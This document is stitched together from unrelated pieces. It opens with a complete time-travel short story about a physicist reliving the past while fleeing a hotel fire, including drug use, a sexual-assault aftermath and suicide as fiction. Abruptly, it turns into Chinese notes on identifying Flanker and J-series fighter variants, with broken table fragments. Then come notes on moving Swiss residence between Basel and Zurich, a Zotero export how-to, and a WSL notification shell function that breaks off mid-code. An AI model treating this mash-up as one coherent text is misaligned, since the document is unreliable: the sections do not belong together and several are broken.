Time travel is subject to two constraints: conservation of energy, and causality. The energy to appear in the past is only borrowed from the Dirac sea, and since ripples in the Dirac sea propagate in the negative direction, transport is only into the past. Energy is conserved in the present as long as the object transported returns with zero time delay, and the principle of causality assures that actions in the past cannot change the present. For example, what if you went into the past and killed your father? Who, then, would invent the time machine?

Once I tried to commit suicide by murdering my father, before he met my mother, twenty-three years before I was born. It changed nothing, of course, and even when I did it, I knew it would change nothing. But you have to try these things. How else could I know for sure?

Next we tried sending a rat back. It made the trip through the Dirac sea and back undamaged. Then we tried a trained rat, one we borrowed from the psychology lab across the green without telling them what we wanted it for. Before its little trip it had been taught to run through a maze to get a piece of bacon. Afterwards, it ran the maze as fast as ever.

We still had to try it on a human. I volunteered myself and didn't allow anyone to talk me out of it. By trying it on myself, I dodged the university regulations about experimenting on humans.

The dive into the negative-energy sea felt like nothing at all. One moment I stood in the center of the loop of Renselz coils, watched by my two grad students and a technician; the next I was alone, and the clock had jumped back exactly one hour. Alone in a locked room with nothing but a camera and a clock, that moment was the high point of my life.

The moment when I first met Dancer was the low point. I was in Berkeley, a bar called Trishia's, slowly getting trashed. I'd been doing that a lot, caught between omnipotence and despair. It was 1967. 'Frisco then—it was the middle of the hippy era—seemed somehow appropriate.

There was a girl, sitting at a table with a group from the university. I walked over to her table and invited myself to sit down. I told her she didn't exist, that her whole world didn't exist, it was all created by the fact that I was watching, and would disappear back into the sea of unreality as soon as I stopped looking. Her name was Lisa, and she argued back. Her friends, bored, wandered off, and in a while Lisa realized just how drunk I was. She dropped a bill on the table and walked out into the foggy night.

I followed her out. When she saw me following, she clutched her purse and bolted.

He was suddenly there under the streetlight. For a second I thought he was a girl. He had bright blue eyes and straight brown hair down to his shoulders. He wore an embroidered Indian shirt, with a silver and turquoise medallion around his neck and a guitar slung across his back. He was lean, almost stringy, and moved like a dancer or a karate master. But it didn't occur to me to be afraid of him.

He looked me over. "That won't solve your problem, you know," he said.

And instantly I was ashamed. I was no longer sure exactly what I'd had in mind or why I'd followed her. It had been years since I'd first fled my death, and I had come to think of others as unreal, since nothing I could do would permanently affect them. My head was spinning. I slid down the wall and sat down, hard, on the sidewalk. What had I come to?

He helped me back into the bar, fed me orange juice and pretzels, and got me to talk. I told him everything. Why not, since I could unsay anything I said, undo anything I did? But I had no urge to. He listened to it all, saying nothing. No one else had ever listened to the whole story before. I can't explain the effect it had on me. For uncountable years I'd been alone, and then, if only for a moment… It hit me with the intensity of a tab of acid. If only for a moment, I was not alone.

We left arm in arm. Half a block away, Dancer stopped, in front of an alley. It was dark.

"Something not quite right here." His voice had a puzzled tone.

I pulled him back. "Hold on. You don't want to go down there—" He pulled free and walked in. After a slight hesitation, I followed.

The alley smelled of old beer, mixed with garbage and stale vomit. In a moment, my eyes became adjusted to the dark.

Lisa was cringing in a corner behind some trash cans. Her clothes had been cut away with a knife, and lay scattered around. Blood showed dark on her thighs and one arm. She didn't seem to see us. Dancer squatted down next to her and said something soft. She didn't respond. He pulled off his shirt and wrapped it around her, then cradled her in his arms and picked her up. "Help me get her to my apartment."

"Apartment, hell. We'd better call the police," I said.

"Call the pigs? Are you crazy? You want them to rape her, too?"

I'd forgotten; this was the sixties. Between the two of us, we got her to Dancer's VW bug and took her to his apartment in The Hash-bury. He explained it to me quietly as we drove, a dark side of the summer of love that I'd not seen before. It was greasers, he said. They come down to Berkeley because they heard that hippie chicks gave it away free, and get nasty when they met one who thought otherwise.

Her wounds were mostly superficial. Dancer cleaned her, put her in bed, and stayed up all night beside her, talking and crooning and making little reassuring noises. I slept on one of the mattresses in the hall. When I woke up in the morning, they were both in his bed. She was sleeping quietly. Dancer was awake, holding her. I was aware enough to realize that that was all he was doing, holding her, but still I felt a sharp pang of jealousy, and didn't know which one of them it was that I was jealous of.

Notes for a Lecture on Time Travel

The beginning of the twentieth century was a time of intellectual giants, whose likes will perhaps never again be equaled. Einstein had just invented relativity, Heisenberg and Schrodinger quantum mechanics, but nobody yet knew how to make the two theories consistent with each other. In 1930, a new person tackled the problem. His name was Paul Dirac. He was twenty-eight years old. He succeeded where the others had failed.

His theory was an unprecedented success, except for one small detail. According to Dirac's theory, a particle could have either positive or negative energy. What did this mean, a particle of negative energy? How could something have negative energy? And why don't ordinary—positive energy—particles fall down into these negative energy states, releasing a lot of free energy in the process?

You or I might have merely stipulated that it was impossible for an ordinary positive energy particle to make a transition to negative energy. But Dirac was not an ordinary man. He was a genius, the greatest physicist of all, and he had an answer. If every possible negative energy state was already occupied, a particle couldn't drop into a negative energy state. Ah ha! So Dirac postulated that the entire universe is entirely filled with negative energy particles. They surround us, permeate us, in the vacuum of outer space and in the center of the earth, every possible place a particle could be. An infinitely dense "sea" of negative energy particles. The Dirac sea.

His argument had holes in it, but that comes later.

Once I went to visit the crucifixion. I took a jet from Santa Cruz to Tel Aviv, and a bus from Tel Aviv to Jerusalem. On a hill outside the city, I dove through the Dirac sea.

I arrived in my three-piece suit. No way to help that, unless I wanted to travel naked. The land was surprisingly green and fertile, more so than I'd expected. The hill was now a farm, covered with grape arbors and olive trees. I hid the coils behind some rocks and walked down to the road. I didn't get far. Five minutes on the road, I ran into a group of people. They had dark hair, dark skin, and wore clean white tunics. Romans? Jews? Egyptians? How could I tell? They spoke to me, but I couldn't understand a word. After a while two of them held me, while a third searched me. Were they robbers, searching for money? Romans, searching for some kind of identity papers? I realized how naive I'd been to think I could just find appropriate dress and somehow blend in with the crowds. Finding nothing, the one who'd done the search carefully and methodically beat me up. At last he pushed me face down in the dirt. While the other two held me down, he pulled out a dagger and slashed through the tendons on the back of each leg. They were merciful, I guess. They left me with my life. Laughing and talking incomprehensibly among themselves, they walked away.

My legs were useless. One of my arms was broken. It took me four hours to crawl back up the hill, dragging myself with my good arm. Occasionally people would pass by on the road, studiously ignoring me. Once I reached the hiding place, pulling out the Renselz coils and wrapping them around me was pure agony. By the time I entered return on the keypad I was wavering in and out of consciousness. I finally managed to get it entered. From the Dirac sea the ripples converged and I was in my hotel room in Santa Cruz. The ceiling had started to fall in where the girders had burned through. Fire alarms shrieked and wailed, but there was no place to run. The room was filled with dense, acrid smoke. Trying not to breathe, I punched out a code on the keypad, somewhen, anywhen other than that one instant and I was in the hotel room, five days before. I gasped for breath. The woman in the hotel bed shrieked and tried to pull the covers up. The man screwing her was too busy to pay any mind. They weren't real anyway. I ignored them and paid a little more attention to where to go next. Back to '65, I figured. I punched in the combo and was standing in an empty room on the thirtieth floor of a hotel just under construction. A full moon gleamed on the silhouettes of silent construction cranes. I flexed my legs experimentally. Already the memory of the pain was beginning to fade. That was reasonable, because it had never happened.

Time travel. It's not immortality, but it's got to be the next best thing.

You can't change the past, no matter how you try.

In the morning I explored Dancer's pad. It was crazy, a small third-floor apartment a block off Haight Ashbury that had been converted into something from another planet. The floor of the apartment had been completely covered with old mattresses, on top of which was a jumbled confusion of quilts, pillows, Indian blankets, stuffed animals. You took off your shoes before coming in—Dancer always wore sandals, leather ones from Mexico with soles cut from old tires. The radiators, which didn't work anyway, were spray painted in Day-Glo colors. The walls were plastered with posters: Peter Max prints, brightly colored Eschers, poems by Allen Ginsberg, record album covers, peace-rally posters, a "Haight Is Love" sign, FBI ten-most-wanted posters torn down from a post office with the photos of famous antiwar activists circled in magic marker, a huge peace symbol in passion-pink. Some of the posters were illuminated with black light and luminesced in impossible colors. The air was musty with incense and the banana-sweet smell of dope. In one corner a record player played Sergeant Peppers' Lonely Hearts Club Band on infinite repeat. Whenever one copy of the album got too scratchy, inevitably one of Dancer's friends would bring in another.

He never locked the door. "Somebody wants to rip me off, well, hey, they probably need it more than I do anyway, okay? It's cool." People dropped by any time of day or night.

I let my hair grow long. Dancer and Lisa and I spent that summer together, laughing, playing guitar, making love, writing silly poems and sillier songs, experimenting with drugs. That was when LSD was blooming onto the scene like sunflowers, when people were still unafraid of the strange and beautiful world on the other side of reality. That was a time to live. I knew that it was Dancer that Lisa truly loved, not me, but in those days free love was in the air like the scent of poppies, and it didn't matter. Not much, anyway.

Notes for a Lecture on Time Travel (continued)

Having postulated that all of space was filled with an infinitely dense sea of negative energy particles, Dirac went further and asked if we, in the positive-energy universe, could interact with this negative-energy sea. What would happen, say, if you added enough energy to an electron to take it out of the negative-energy sea? Two things: first, you would create an electron, seemingly out of nowhere. Second, you would leave behind a "hole" in the sea. The hole, Dirac realized, would act as if it were a particle itself, a particle exactly like an electron except for one thing: it would have the opposite charge. But if the hole ever encountered an electron, the electron would fall back into the Dirac sea, annihilating both electron and hole in a bright burst of energy. Eventually they gave the hole in the Dirac sea a name of its own: "positron." When Anderson discovered the positron two years later to vindicate Dirac's theory, it was almost an anticlimax.

And over the next fifty years, the reality of the Dirac sea was almost ignored by physicists. Antimatter, the holes in the sea, was the important feature of the theory; the rest was merely a mathematical artifact.

Seventy years later, I remembered the story my transfinite math teacher told and put it together with Dirac's theory. Like putting an extra guest into a hotel with an infinite number of rooms, I figured out how to borrow energy from the Dirac sea. Or, to put it another way: I learned how to make waves.

And waves on the Dirac sea travel backward in time.

Next we had to try something more ambitious. We had to send a human back farther into history, and obtain proof of the trip. Still we were afraid to make alterations in the past, even though the mathematics stated that the present could not be changed.

We pulled out our movie camera and chose our destinations carefully.

In September of 1853 a traveler named William Hapland and his family crossed the Sierra Nevadas to reach the California coast. His daughter Sarah kept a journal, and in it she recorded how, as they reached the crest of Parker's Ridge, she caught her first glimpse of the distant Pacific ocean exactly as the sun touched the horizon, "in a blays of cryms'n glorie," as she wrote. The journal still exists. It was easy enough for us to conceal ourselves and a movie camera in a cleft of rocks above the pass, to photograph the weary travelers in their ox-drawn wagon as they crossed.

The second target was the great San Francisco earthquake of 1906. >From a deserted warehouse that would survive the quake—but not the following fire—we watched and took movies as buildings tumbled down around us and embattled firemen in horse-drawn fire-trucks strove in vain to quench a hundred blazes. Moments before the fire reached our building, we fled into the present.

The films were spectacular.

We were ready to tell the world.

There was a meeting of the AAAS in Santa Cruz in a month. I called the program chairman and wangled a spot as an invited speaker without revealing just what we'd accomplished to date. I planned to show those films at the talk. They were to make us instantly famous.

The day that Dancer died we had a going-away party, just Lisa and Dancer and I. He knew he was going to die; I'd told him and somehow he believed me. He always believed me. We stayed up all night, playing Dancer's secondhand guitar, painting psychedelic designs on each other's bodies with greasepaint, competing against each other in a marathon game of cutthroat Monopoly, doing a hundred silly, ordinary things that took meaning only from the fact that it was the last time. About four in the morning, as the glimmer of false-dawn began to show in the sky, we went down to the bay and, huddling together for warmth, went tripping. Dancer took the largest dose, since he wasn't going to return. The last thing he said, he told us not to let our dreams die; to stay together.

We buried Dancer, at city expense, in a welfare grave. We split up three days later.

I kept in touch with Lisa, vaguely. In the late seventies she went back to school, first for an MBA, then law school. I think she was married for a while. We wrote each other cards on Christmas for a while, then I lost track of her. Years later, I got a letter from her. She said that she was finally able to forgive me for causing Dan's death.

It was a cold and foggy February day, but I knew I could find warmth in 1965. The ripples converged.

Anticipated questions from the audience:

Q (old, stodgy professor): It seems to me this proposed temporal jump of yours violates the law of conservation of mass/energy. For example, when a transported object is transported into the past, a quantity of mass will appear to vanish from the present, in clear violation of the conservation law.

A (me): Since the return is to the exact time of departure, the mass present is constant.

Q: Very well, but what about the arrival in the past? Doesn't this violate the conservation law?

A: No. The energy needed is taken from the Dirac sea, by the mechanism I explain in detail in the Phys Rev paper. When the object returns to the "future," the energy is restored to the sea.

Q (intense young physicist): Then doesn't Heisenberg uncertainty limit the amount of time that can be spent in the past?

A: A good question. The answer is yes, but because we borrow an infinitesimal amount of energy from an infinite number of particles, the amount of time spent in the past can be arbitrarily large. The only limitation is that you must leave the past an instant before you depart from the present.

In half an hour I was scheduled to present the paper that would rank my name with Newton's and Galileo's—and Dirac's. I was twenty-eight years old, the same age as Dirac when he announced his theory. I was a firebrand, preparing to set the world aflame. I was nervous, rehearsing the speech in my hotel room. I took a swig out of an old Coke that one of my grad students had left sitting on top of the television. The evening news team was babbling on, but I wasn't listening.

I never delivered that talk. The hotel had already started to burn; my death was already foreordained. Tie neat, I inspected myself in the mirror, then walked to the door. The doorknob was warm. I opened it onto a sheet of fire. Flame burst through the opened door like a ravening dragon. I stumbled backward, staring at the flames in amazed fascination.

Somewhere in the hotel I heard a scream, and all at once I broke free of my spell. I was on the thirtieth story; there was no way out. My thought was for my machine. I rushed across the room and threw open the case holding the time machine. With swift, sure fingers I pulled out the Renselz coils and wrapped them around my body. The carpet had caught on fire, a sheet of flame between me and any possible escape. Holding my breath to avoid suffocation, I punched an entry into the keyboard and dove into time.

I return to that moment again and again. When I hit the final key, the air was already nearly unbreathable with smoke. I had about thirty seconds left to live, then. Over the years I've nibbled away my time down to ten seconds or less.

I live on borrowed time. So do we all, perhaps. But I know when and where my debt will fall due.

Dancer died on February 9, 1969. It was a dim, foggy day. In the morning he said he had a headache. That was unusual, for Dancer. He never had headaches. We decided to go for a walk through the fog. It was beautiful, as if we were alone in a strange, formless world. I'd forgotten about his headache altogether, until, looking out across the sea of fog from the park over the bay, he fell over. He was dead before the ambulance came. He died with a secret smile on his face. I've never understood that smile. Maybe he was smiling because the pain was gone.

Lisa committed suicide two days later.

You ordinary people, you have the chance to change the future. You can father children, write novels, sign petitions, invent new machines, go to cocktail parties, run for president. You affect the future with everything you do. No matter what I do, I cannot. It is too late for that, for me. My actions are written in flowing water. And having no effect, I have no responsibilities. It makes no difference what I do, not at all.

When I first fled the fire into the past, I tried everything I could to change it. I stopped the arsonist, I argued with mayors, I even went to my own house and told myself not to go to the conference.

But that's not how time works. No matter what I do, talk to a governor or dynamite the hotel, when I reach that critical moment— the present, my destiny, the moment I left—I vanish from whenever I was, and return to the hotel room, the fire approaching ever closer. I have about ten seconds left. Every time I dive through the Dirac sea, everything I changed in the past vanishes. Sometimes I pretend that the changes I make in the past create new futures, though I know this is not the case. When I return to the present, all the changes are wiped out by the ripples of the converging wave, like erasing a blackboard after a class.

Someday I will return and meet my destiny. But for now, I live in the past. It's a good life, I suppose. You get used to the fact that nothing you do will ever have any effect on the world. It gives you a feeling of freedom. I've been places no one has ever been, seen things no one alive has ever seen. I've given up physics, of course. Nothing I discover could endure past that fatal night in Santa Cruz. Maybe some people would continue for the sheer joy of knowledge. For me, the point is missing.

But there are compensations. Whenever I return to the hotel room, nothing is changed but my memories. I am again twenty-eight, again wearing the same three-piece suit, again have the fuzzy taste of stale cola in my mouth. Every time I return, I use up a little bit of time. One day I will have no time left.

Dancer, too, will never die. I won't let him. Every time I get to that final February morning, the day he died, I return to 1965, to that perfect day in June. He doesn't know me, he never knows me. But we meet on that hill, the only two willing to enjoy the day doing nothing. He lies on his back, idly fingering chords on his guitar, blowing bubbles and staring into the clouded blue sky. Later I will introduce him to Lisa. She won't know us either, but that's okay. We've got plenty of time.

"Time," I say to Dancer, lying in the park on the hill. "There's so much time."

"All the time there is," he says.




基本类型侧卫 —— 俄系侧卫

垂尾平行前轮双轮有空中加油接口侧偏有机首空速管普通翼身融合,无鸭翼Su-30MKK、Su-30MK2 也是这个基本构型
垂尾切尖前轮双轮有空中加油接口侧偏有机首空速管有鸭翼出口印度、马来西亚和阿尔及利亚的 Su-30MKI/M/A 也是这个基本构型
垂尾切尖前轮双轮有空中加油接口侧偏没有机首空速管普通翼身融合,无鸭翼雷达罩后方有 4 个小型 L 型空速管早期验证机其实有鸭翼


首先,J-11 完全等同于 Su-27,J-15 模仿的是 Su-33,J-16 模仿的是 Su-30,所以可以按照判断 Su-27、Su-30、Su-33 的方法大致把看到的 PLA 飞机归类。但进一步判断改型则需要结合涂装、雷达罩、翼尖挂架等等来具体判断。

PLAAF 也买了一些俄方交付的 Su-27、Su-30 和 Su-35,和歼系(即使是组装的 J-11A)的最大区别就是没有编队灯。在此一并列出。

PLA 的海军飞机都是偏白的,空海军共有的飞机的海军机种后面会带 H(如 J-11BH),在此不做区分。(P.S. H for Haijun,哈哈哈哈)



单座 双座 座舱机身明显分界 座舱机身平滑过渡 垂尾不切尖 垂尾切尖 单前轮 双前轮 IRST居中 IRST偏左 有空中加油接口 无空中加油接口 无鸭翼 有鸭翼


  • IRST:全称 Infra-Red Search and Track,红外跟踪与搜索技术。能够探测目标和空中背景的温差进行红外成像,和被动雷达类似,所以也被称为红外雷达。


  1. 如何区分一众苏和歼? - kago嘉语的回答 - 知乎

Move back and forth from Basel to Zurich

Zurich to Basel


  1. 网上申请换州(canton)
  2. 在苏黎世注销
  3. 通知后去当地的 Residents' Registration Office 登记



Nicht EU/EFTA-Bürgerinnen und Bürger (Drittstaaten): Zuzug aus der Schweiz

  1. Einverständnis zum Kantonswechsel Falls noch nicht eingereicht, können Sie das Gesuch online oder als PDF (128 KB) einreichen
  2. Anmeldeformular ausgefüllt pro erwachsene Person
  3. Vorstrafen- und Wohnsitzerklärung ausgefüllt pro erwachsene Person
  4. Abmeldebescheinigung der letzten Wohnsitzgemeinde in der Schweiz
  5. Ausländerausweis (L / B / C)
  6. Gültiger Reisepass oder Identitätskarte (bei schriftlicher Anmeldung bitte farbige Kopie der Vorder- UND Rückseite der Identitätskarte)
  7. a) Zuzug von verheirateten Personen: Trauungsurkunde oder Familienbüchlein/-ausweis b) Für Kinder unter 21 Jahren: Familienbüchlein oder Geburtsurkunde c) Erklärung bei Kindern unter gemeinsamer elterlicher Sorge (PDF, 24 KB)
  8. Mietvertrag oder Wohnungsausweis*.



  • 无犯罪记录声明,自己填一下就行
  • Permit B
  • 护照
  • 从苏黎世的注销证明
  • 房契
  • certificate of employment
  • 三个工资单

Basel to Zurich

大体流程仍然是先在网上申请换州,然后在 Basel Stadt 注销,最后去 Zurich 注册。

插曲:reactivate my residence status

My residence status was deactivated since I no longer live in my old residence in Basel and was not in Switzerland during June and July for my internship. During that time, a letter arrived and was sent back to the Migrationsamt, as a result they deactivated my residence status. I had to go to the Migrationsamt to reactivate it first.

The required documents are:

  • Rental agreement / contract showing that I occupied the place before I left Switzerland
  • Flight ticket showing that I am not in Switzerland during June and July
  • New rental agreement / contract
  • CHF 40


Submit a contact form via this link.

The ZH-number is the "KANT.REFERENZ" on the back of your residence permit.

ZEMIS NR is the number in front of KANT.REFERENZ.

在申请换州时,最好把所需的文件全部提交,以免被要求补充(可能会用 slow mail,非常抽象)。


  • Passport scan
  • Permit B scan
  • Matriculation certificate
  • New rental agreement
  • Proof that you hold enough money for a year in your bank account

Citation generation

Genearte .bib

Use Zotero to manage references and export them as .bib files. Note that he bibliography can only be generated at the collection level.

  1. Right click on the collection to export
  2. Choose Export Collection
  3. Choose BibTeX or BibLaTeX as the export format
  4. Save the file

Generate copy-pasteable citation

Use mybib to generate IEEE citation (it can also generate other styles but I basically hate everthing else except IEEE).

Notify myself


Works on Linux Desktop.

TODO: elaborate on this.


For sending WSL notifications to Windows. Works as a toast.


Get wsl-notify-send.exe from the GitHub release page, unzip it (contains LICENSE, README.md and wsl-notify-send.exe), and put it in your PATH.

To use it conveniently similar to notif-send, add this to your shell rc file:

notify-send() {
    wsl-notify-send.exe --category $WSL_DISTRO_NAME "${@}";